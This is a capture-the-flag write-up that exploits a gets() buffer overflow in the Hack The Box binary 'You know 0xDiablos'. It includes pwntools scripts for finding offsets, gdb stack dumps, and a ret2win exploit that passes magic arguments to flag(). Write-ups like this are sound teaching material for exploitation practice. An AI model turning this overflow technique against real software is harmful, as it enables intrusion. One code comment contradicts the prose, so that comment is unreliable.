__                                   
                                 ____ _____    _____/  |_                                 
                               _/ ___\\__  \  /    \   __\                                
                               \  \___ / __ \|   |  \  |                                  
                                \___  >____  /___|  /__|                                  
                                    \/     \/     \/                                      
                                                                                          
                                  ________  _  ______                                     
                                  \____ \ \/ \/ /    \                                    
                                  |  |_> >     /   |  \                                   
                                  |   __/ \/\_/|___|  /                                   
                                  |__|              \/                                    
                                                                                          
                                                                                          
                                                                                          
─────────────────────────────────── cause I can't pwn ────────────────────────────────────
                                                                                          
 < back home                                                                              
                                                                                          
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃                                   you know 0xdiablos                                   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛

The challenge is one of the first pwn challenges in HTB and can be found here.            


                                Finding the Vulnerability                                 

The first thing I do after downloading the challenge (unzip with the password
hackthebox!) is try running it. After that, I use IDA to decompile it:

                                                                                          
 int __cdecl main(int argc, const char **argv, const char **envp)                         
 {                                                                                        
   __gid_t v4; // [esp+0h] [ebp-Ch]                                                       
                                                                                          
   setvbuf(stdout, 0, 2, 0);                                                              
   v4 = getegid();                                                                        
   setresgid(v4, v4, v4);                                                                 
   puts("You know who are 0xDiablos: ");                                                  
   vuln();                                                                                
   return 0;                                                                              
 }                                                                                        
                                                                                          

Cool, nothing particularly interesting here, except that we have a hint: a function called
vuln(). Decompiling that function:

                                                                                          
 int vuln()                                                                               
 {                                                                                        
   char s[180]; // [esp+0h] [ebp-B8h] BYREF                                               
                                                                                          
   gets(s);                                                                               
   return puts(s);                                                                        
 }                                                                                        
                                                                                          

The gets() function has no limit on the number of characters it will read (man gets in the
terminal):                                                                                

                                                                                          
 NAME                                                                                     
        gets - get a string from standard input (DEPRECATED)                              
                                                                                          
 LIBRARY                                                                                  
        Standard C library (libc, -lc)                                                    
                                                                                          
 SYNOPSIS                                                                                 
        #include <stdio.h>                                                                
                                                                                          
        [[deprecated]] char *gets(char *s);                                               
                                                                                          
 DESCRIPTION                                                                              
        Never use this function.                                                          
                                                                                          
        gets() reads a line from stdin into the buffer pointed to by s until either a     
 terminating newline or EOF, which it replaces with a null byte ('\0').  No check for     
 buffer overrun is performed (see BUGS below).                                            
                                                                                          
 RETURN VALUE                                                                             
        gets() returns s on success, and NULL on error or when end of file occurs while   
 no characters have been read.  However, given the lack of buffer overrun checking, there 
 can be no guarantees that the function will even return.                                 
                                                                                          

Fair enough, never use this function, and with good reason! If we write more than 180     
bytes (read: characters in ASCII encoding), we will overflow the buffer. We can show that 
we can break this, by just passing much more than 180 characters.                         

First, this is the 'normal' behavior we expect:                                           

                                                                                          
 vscode ➜ /workspaces/htb/you_know_0xdiablos $ ./vuln                                     
 You know who are 0xDiablos:                                                              
 test                                                                                     
 test                                                                                     
                                                                                          

It just echoes. Using pwntools to give an input much larger than 180 characters (again,   
bytes, but it's the same using ASCII encoding),                                           

                                                                                          
 from pwn import *                                                                        
                                                                                          
                                                                                          
 def start(exe):                                                                          
     return process(exe)                                                                  
                                                                                          
                                                                                          
 exe = './vuln'                                                                           
 io = start(exe)                                                                          
                                                                                          
 io.sendafter(b'You know who are 0xDiablos:', b'A' * 1000 + b'\n')                        
 io.recvall(timeout=1)                                                                    
                                                                                          

which when run:                                                                           

                                                                                          
 vscode ➜ /workspaces/htb/you_know_0xdiablos $ python show_vuln.py                        
 [+] Starting local process './vuln': pid 5542                                            
 [+] Receiving all data: Done (1003B)                                                     
 [*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 5542)                     
                                                                                          

Awesome, the process dies with SIGSEGV (a segmentation fault), meaning that our input
overwrote data on the stack beyond the buffer: we have a buffer overflow vulnerability.
Now, on to exploiting it.


                                       Exploitation                                       

First, let's consider the target: how do we get the flag? This will give more direction to
finding the most suitable method of exploitation. Doing some exploration in IDA, shows the
following functions:                                                                      

main: Our main function.                                                               
vuln: The function we just found the vulnerability in.                                 
flag: Oh well would you look at that.                                                  

Decompiling the flag function, gives the following:                                       

                                                                                          
 char *__cdecl flag(int a1, int a2)                                                       
 {                                                                                        
   char *result; // eax                                                                   
   char s[64]; // [esp+Ch] [ebp-4Ch] BYREF                                                
   FILE *stream; // [esp+4Ch] [ebp-Ch]                                                    
                                                                                          
   stream = fopen("flag.txt", "r");                                                       
   if ( !stream )                                                                         
   {                                                                                      
     puts("Hurry up and try in on server side.");                                         
     exit(0);                                                                             
   }                                                                                      
   result = fgets(s, 64, stream);                                                         
   if ( a1 == -559038737 && a2 == -1059139571 )                                           
     return (char *)printf(s);                                                            
   return result;                                                                         
 }                                                                                        
                                                                                          

This opens flag.txt, reads up to 64 bytes (one line) from it into a buffer, checks whether
the two arguments equal some specific values and, only if they do, prints the contents
that were read from flag.txt.

▌ When I did this challenge, I immediately saw the flag function, tried to run a buffer
▌ overflow to return to that function, and was met with the string "Hurry up and try in
▌ on server side." (which flag() prints when it cannot open flag.txt). Of course, this
▌ didn't work because I had failed to read over the whole function and see the argument
▌ checks at the end. I rushed and didn't include the required arguments.

Cool, the first thought is to overwrite the return address of vuln using our buffer       
overflow to go to this function, but we also have to construct the stack in such a way    
that the two passed arguments equal those values. These seem strange, but looking at the  
assembly:                                                                                 

🌆 alt text                                                                               

We can see that the two cmp (compare) instructions in the bottom right two boxes (the ones
that don't follow the "Hurry up and try [...]" code path) check whether [ebp+arg_0]
equals 0DEADBEEFh (the h at the end just indicates it's a hex value, i.e. 0xDEADBEEF), and
whether [ebp+arg_4] equals 0C0DED00Dh (0xC0DED00D). These are the same constants that the
decompiler displayed as the signed decimals -559038737 and -1059139571. (The flag assembly
also shows the values of arg_0 and arg_4: 8 and 0Ch.)

This means that, inside flag, the first value has to be at an offset of 0x8 bytes from
the stack base pointer (ebp), and the second at an offset of 0xC (or 12 in decimal) bytes
from ebp.

We can do this by calculating the offsets in our input at which we overwrite the saved
return address (which ends up in eip, the instruction pointer, and should point to flag)
and the saved ebp (the stack base pointer, as mentioned before). To find them, we crash
the program with a cyclic pattern and analyze the core dump generated:

                                                                                          
 from pwn import *                                                                        
 import os                                                                                
                                                                                          
 os.system('clear')                                                                       
                                                                                          
                                                                                          
 def start(exe, argv=[], *a, **kw):                                                       
     return process([exe] + argv, *a, **kw)                                               
                                                                                          
                                                                                          
 def get_offset(binpath, payload_len=2000, argv=[]):                                      
     with process([binpath] + argv) as io:                                                
         io.sendline(cyclic(payload_len))  # type: ignore                                 
         io.wait()                         # wait for the crash to produce a core         
                                                                                          
     core = io.corefile                                                                   
                                                                                          
     def get_offset_reg(reg):                                                             
         try_pat = p32(getattr(core, reg))                                                
         if cyclic_find(try_pat) == -1:                                                   
             return None                                                                  
                                                                                          
         return cyclic_find(try_pat)                                                      
                                                                                          
     ip_off = get_offset_reg('eip')                                                       
     bp_off = get_offset_reg('ebp')                                                       
                                                                                          
     return ip_off, bp_off                                                                
                                                                                          
                                                                                          
 exe = './vuln'                                                                           
 elf = context.binary = ELF(exe, checksec=True)                                           
 context.log_level = 'INFO'                                                               
 ip_off, bp_off = get_offset(exe)                                                         
                                                                                          
 if ip_off and bp_off:                                                                    
     success(f"Offsets (eip, ebp) --> {ip_off}, {bp_off}")                                
 else:                                                                                    
     error("Something went wrong... Please check the corefile")                           
                                                                                          

Running this, we get the following:                                                       

                                                                                          
 [*] '/workspaces/htb/you_know_0xdiablos/vuln'                                            
     Arch:       i386-32-little                                                           
     RELRO:      Partial RELRO                                                            
     Stack:      No canary found                                                          
     NX:         NX unknown - GNU_STACK missing                                           
     PIE:        No PIE (0x8048000)                                                       
     Stack:      Executable                                                               
     RWX:        Has RWX segments                                                         
     Stripped:   No                                                                       
 [+] Starting local process './vuln': pid 18512                                           
 [*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 18512)                    
 [+] Parsing corefile...: Done                                                            
 [!] Error parsing corefile stack: Found bad environment at 0xff862fd1                    
 [*] '/workspaces/htb/you_know_0xdiablos/core.18512'                                      
     Arch:      i386-32-little                                                            
     EIP:       0x62616177                                                                
     ESP:       0xff860f90                                                                
     Exe:       '/workspaces/htb/you_know_0xdiablos/vuln' (0x8048000)                     
     Fault:     0x62616177                                                                
 [+] Offsets (eip, ebp) --> 188, 184                                                      
                                                                                          

Great! Not only do we have the offsets, but we can see that there are no stack canaries or
PIE, ensuring that overwriting the stack won't be a problem, and that addresses inside the
binary (such as the address of flag) don't change from execution to execution.

▌ Note that this makes sense given the layout of the stack (and we didn't necessarily
▌ need to calculate ebp). Classically, the layout is as follows (higher addresses at the
▌ top, offsets relative to ebp):

 +0x04: old_eip    (payload offset 188)
 +0x00: old_ebp    (payload offset 184)   <--- ebp
 -0x04: 4 bytes between s and old_ebp
 -0x05: s[179]
  [...]
 -0xB7: s[1]
 -0xB8: s[0]       (payload offset 0)     <--- esp

▌ In our case, the local variable is the buffer s, which we 'write' from bottom to top in
▌ the diagram. IDA places s at ebp-0xB8, and 0xB8 = 184, which is exactly the ebp offset
▌ we measured. Since words in a 32-bit binary are 4 bytes wide, we overwrite old_ebp
▌ 4 bytes earlier than old_eip.

Overwriting the EIP is easy (shown later), but since we need to point ebp at some known
memory address whose contents we control, I opted to just find out the stack location of
the buffer we're trying to overflow (i.e. the address of s[]):

                                                                                          
 from pwn import *                                                                        
                                                                                          
                                                                                          
 def start(exe, gdbscript='', argv=[], *a, **kw):                                         
     context.terminal = ['tmux', 'splitw', '-h']                                          
     return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)                        
                                                                                          
                                                                                          
 gdbscript = """                                                                          
 b vuln                                                                                   
 continue                                                                                 
 """                                                                                      
                                                                                          
 exe = './vuln'                                                                           
                                                                                          
 elf = context.binary = ELF(exe, checksec=True)                                           
 context.log_level = 'INFO'                                                               
                                                                                          
 io = start(exe, gdbscript=gdbscript)                                                     
 io.recvall()                                                                             
                                                                                          

Notice the gdbscript, which breaks at vuln. Entering reg ebp in the pwndbg prompt gives us:

                                                                                          
 0xf7f6b560 in _start () from target:/lib/ld-linux.so.2                                   
 Breakpoint 1 at 0x8049276                                                                
 Reading /lib/i386-linux-gnu/libc.so.6 from remote target...                              
                                                                                          
 Breakpoint 1, 0x08049276 in vuln ()                                                      
 *EBP  0xffd99c38 —▸ 0xffd99c58 ◂— 0                                                      
                                                                                          

I just want to verify this by starting the buffer with an A and following it with a large
number of B's. Running the same code as before, just with that payload inserted, we get:

                                                                                          
 ──────────────────────────[ STACK ]────────────────────────────────────────              
 00:0000│ esp 0xffcb2dc0 —▸ 0xffcb2dd0 ◂— 0x42424241 ('ABBB')                             
 01:0004│-0c4 0xffcb2dc4 —▸ 0xf7fa0de7 (_IO_2_1_stdout_+71) ◂— 0xfa19b80a                 
 02:0008│-0c0 0xffcb2dc8 ◂— 1                                                             
 03:000c│-0bc 0xffcb2dcc —▸ 0x8049281 (vuln+15) ◂— add ebx, 0x2d7f                        
 04:0010│ eax 0xffcb2dd0 ◂— 0x42424241 ('ABBB')                                           
 05:0014│-0b4 0xffcb2dd4 ◂— 0x42424242 ('BBBB')                                           
 ... ↓        2 skipped                                                                   
 ───────────────────────────────────────────────────────────────────────────              
                                                                                          

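This shows that our ABBB is at 0xffcb2dd0. The same address is in eax and at the top of
the stack: gets() is an ordinary libc function (not a syscall), so under the 32-bit cdecl
convention the buffer pointer is passed to it on the stack, and gets() returns that same
pointer, which is why it ends up in eax. This means our payload becomes: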

                                                                                          
 buffer_start_address = 0xffcb2dd0                                                        
 eip_offset = 188                                                                         
 ebp_offset = 184                                                                         
                                                                                          
 flag_stack = pack(0xDEADBEEF) + pack(0xC0DED00D)                                         
 padding = (ebp_offset - len(flag_stack)) * b'0x92'                                       
 overflow = pack(buffer_start_address) + pack(elf.symbols['flag'])                        
                                                                                          

However, this is not quite right. What I was trying to do (overwrite the saved ebp with an
address somewhere inside the buffer so that flag() would see the magic values at [ebp+8] /
[ebp+12]) fails for a simple reason: flag() runs its own prologue (push ebp; mov ebp, esp)
and immediately overwrites ebp with the current esp.

The issue was that I didn't quite understand how the stack works when calling a function, 
which is effectively what we're trying to emulate here. Calling a function, the following 
would happen in assembly:                                                                 

                                                                                          
 push arg_1                                                                               
 push arg_0                                                                               
 call flag   # push eip on the stack, replace eip with <flag>                             
                                                                                          

The stack would then look like:                                                           

                                                                                          
 [arg_1]                                                                                  
 [arg_0]                                                                                  
 [old_eip]                                                                                
                                                                                          

The stack layout at the end of a function (before the epilogue) is as follows:            

                                                                                          
 [old_ebp]                                                                                
 [old_eip]                                                                                
                                                                                          

Since we're faking calling a function, we can emulate this as follows:                    

                                                                                          
 payload = flat(                                                                          
     eip_offset * b'A',      # padding                                                    
     elf.symbols['flag'],    # flag function address (old eip)                            
     elf.symbols['main'],    # any valid pointer (old ebp)                                
     0xDEADBEEF,             # argument 1                                                 
     0xC0DED00D              # argument 2                                                 
 )                                                                                        
                                                                                          

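This is the reverse order, since we're writing into the buffer in the opposite direction
to the way the stack grows. Note that the word right after flag's address is what flag()
will treat as its own return address (the saved ebp of vuln is already covered by the
padding), so any valid code pointer such as main will do. This leaves us with the final
script: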

                                                                                          
 from pwn import *                                                                        
 import os                                                                                
                                                                                          
 os.system('clear')                                                                       
                                                                                          
                                                                                          
 def start(exe, argv=[], *a, **kw):                                                       
     if args.REMOTE:                                                                      
         host, ip = sys.argv[1].split(':')                                                
         return remote(host, ip, *a, **kw)                                                
     elif args.GDB:                                                                       
         context.terminal = ['tmux', 'splitw', '-h']                                      
         return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)                    
     else:                                                                                
         return process([exe] + argv, *a, **kw)                                           
                                                                                          
                                                                                          
 gdbscript = """                                                                          
 b vuln                                                                                   
 b flag                                                                                   
 continue                                                                                 
 """                                                                                      
                                                                                          
 exe = './vuln'                                                                           
 elf = context.binary = ELF(exe, checksec=True)                                           
 context.log_level = 'INFO'                                                               
                                                                                          
 flag = re.compile(r"HTB{.+?}")                                                           
 buffer_start_address = 0xffcb2dd0  # from get_stack.py                                   
 eip_offset = 188                                                                         
 ebp_offset = 184                                                                         
                                                                                          
 io = start(exe)                                                                          
                                                                                          
 payload = flat(                                                                          
     eip_offset * b'A',      # padding                                                    
     elf.symbols['flag'],    # flag function address (old eip)                            
     elf.symbols['main'],    # any valid pointer (old ebp)                                
     0xDEADBEEF,             # argument 1                                                 
     0xC0DED00D              # argument 2                                                 
 )                                                                                        
                                                                                          
 info(f"Sending payload to flag address: {payload.hex()}")                                
 io.sendlineafter(b'0xDiablos:', payload)                                                 
                                                                                          
 if args.GDB:                                                                             
     response = io.recvall().decode(errors="ignore", encoding="ascii")                    
 else:                                                                                    
     response = io.recvall(timeout=.5).decode(errors="ignore", encoding="ascii")          
                                                                                          
 match = flag.search(response)                                                            
                                                                                          
 if match:                                                                                
     success(f"FLAG --> {match.group(0)}")                                                
 else:                                                                                    
     warning(f"FLAG NOT FOUND")                                                           
     info(f"Response:\n{response}")